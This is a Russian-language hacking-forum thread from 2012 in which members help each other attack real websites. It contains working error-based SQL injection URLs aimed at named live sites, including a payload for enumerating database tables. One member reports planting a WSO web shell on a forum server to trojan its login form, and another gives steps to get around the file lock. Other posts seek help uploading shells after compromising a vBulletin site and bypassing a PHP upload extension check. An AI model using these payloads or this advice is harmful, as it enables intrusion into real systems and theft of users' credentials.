Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    2Tr[1]x,
    Можно.

    P.S. Что за прога?
     
  2. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    программа Xspider
     
    1 person likes this.
  3. Tr[1]x

    Tr[1]x New Member

    Joined:
    20 Aug 2010
    Messages:
    30
    Likes Received:
    1
    Reputations:
    0
    Ereee, не подскажешь как именно?
     
  4. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Обычно сканеры показывают CVE. По нем ищи сплойт в гугле.
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ТАксс, пару вопросов

    не могу вывести данные через еррор, кто что подскажет

    второе

    в обоих случаях стольбы подобрал но на екран ничего не выводит, крутить как блинд не избежно или всётаки ожно чтонибуть сделать?

    и наконец третее

    что в запрос не подставлю постоянно вылетает только ошибка и никакого вывода, как быть?
     
  6. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    qaz,
    третье - слепая
    вторая - слепая, попробуй что-нибудь сделать.
     
    1 person likes this.
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    qaz


    первый

    http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+

    второй наверное слепая

    3

    http://www.57productions.com/article_reader.php?id=11+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

    третья ветка, поэтому юнион не катит
     
    _________________________
    #19267 Konqi, 5 Feb 2012
    Last edited: 5 Feb 2012
    1 person likes this.
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу
    может я не туда его влепил?
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
     
    _________________________
    1 person likes this.
  10. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Выпилил следующую БД,но limit отказывается работать.Как в таком случае данные выбрать ?

    -id+union+select+table_name,2,3+from+information_schema.tables

    Выдаёт одну запись.Всё.

    Забыл добавить,что никаких ошибок аля *OLE DB Driver *не выводится.
    system_user не sa,к сожалению = )

    Code:
    [Microsoft SQL Server 2005
     
    #19270 Breetonia, 5 Feb 2012
    Last edited: 5 Feb 2012
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    not in
     
  12. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Спасибо,реально забыл )
     
  13. DivineRock

    DivineRock New Member

    Joined:
    13 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Вечер в хату, господа. Залил шелл(WSO) на сервер одного форума(vb) и хотел было протроянить форму логина, но не могу править/удалить/заменить файл login.php - выдаёт ошибку "File isn't writeable"(через консоль тоже не прокатывает). Причём любой другой файл могу править, создавать файлы/папки в любом месте. Подскажите в какую сторону копать.
    ОС Windows Server 2008 R2 Web Server Edition SP1. IIS/7.5.
     
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Chmod-ить пробовал?

    P.S. Если файл не правится и не чмодится, но в эту папку льются другие файлы:
    1) Скачай login.php
    2) Удали login.php с сервера
    3) Загрузи скачанный файл login.php
    4) Профит, все будет правится =)
     
  15. DivineRock

    DivineRock New Member

    Joined:
    13 Jan 2008
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Chmod не прокатывает, а login.php не могу удалить, заменить тоже.
     
  16. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    Code:
    <b>Warning</b>:  fopen(./structure/http://some-inexistent-website/some_inexistent_file_with_long_name/0.php) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: No such file or directory in <b>/homepages/34/d233637692/htdocs/modules/toload/structure/functions.php</b> on line <b>37</b>
    ,
    это выплюнул сканнер, ошибка file inclusion, только не понятно вот это - fopen(./structure/http://some-inexistent-website/some_inexistent_file_with_long_name/0.php), это что получяется что скачиваемый файл должен иметь длинное имя чтоль??
     
  17. kravch_v

    kravch_v Member

    Joined:
    1 Sep 2011
    Messages:
    134
    Likes Received:
    43
    Reputations:
    1
    Скрипт не может определить правильные директории для подключения необходимых файлов. (Такого файла или директории - не существует).
     
    #19277 kravch_v, 6 Feb 2012
    Last edited: 6 Feb 2012
  18. NetAng

    NetAng Member

    Joined:
    29 Dec 2010
    Messages:
    75
    Likes Received:
    12
    Reputations:
    5
    Никак дальше union+select не хочет выполнятся.
     
  19. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Здравствуйте!
    Ломанул булку, шелл залить понятия как не имею.
    Слышал про стили, но не могу найти шелла в формате xml.
    Помогите пжлста, наведите хотя бы на ссылку какую нибудь. Заранее благодарен!
    Версия булки 4.0.х
    Пост пжлста не удаляйте!
     
    #19279 stan0009, 6 Feb 2012
    Last edited: 6 Feb 2012
  20. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Реально ли как-то обойти такого рода функцию проверки расширений файлов и залить скажем исполняемый файл?

    PHP:
    if(!empty($upload)){
        
    $errore='';
        for(
    $i 1$i <= 5$i++){
            if(!empty(${
    'name'.$i})){
                if((
    strrchr(${'name'.$i.'_name'},".")==".doc") OR (strrchr(${'name'.$i.'_name'},".")==".xls") OR (strrchr(${'name'.$i.'_name'},".")==".zip") OR (strrchr(${'name'.$i.'_name'},".")==".exe") OR (strrchr(${'name'.$i.'_name'},".")==".pdf") OR (strrchr(${'name'.$i.'_name'},".")==".rar") OR (strrchr(${'name'.$i.'_name'},".")==".mp3")){
                    
    move_uploaded_file("${'name'.$i}""../../Files/${'name'.$i.'_name'}");
                    if(
    is_file("../../Files/${'name'.$i.'_name'}")){
                        if(
    chmod("../../Files/${'name'.$i.'_name'}",0777)){
                        }
                        else{
                            
    $parse=$Errore_ChmodFile;
                        }
                    }
                }
                else{
                    
    $errore.=${'name'.$i.'_name'}." ";
                }
            }
        }
        if(
    $errore!=''){
            
    header("location:files.php?parse=$parse&errore=$errore");
        }
        else if(
    $errore=''){
            
    header("location:files.php?parse=$parse");
        }
    }
     
Thread Status:
Not open for further replies.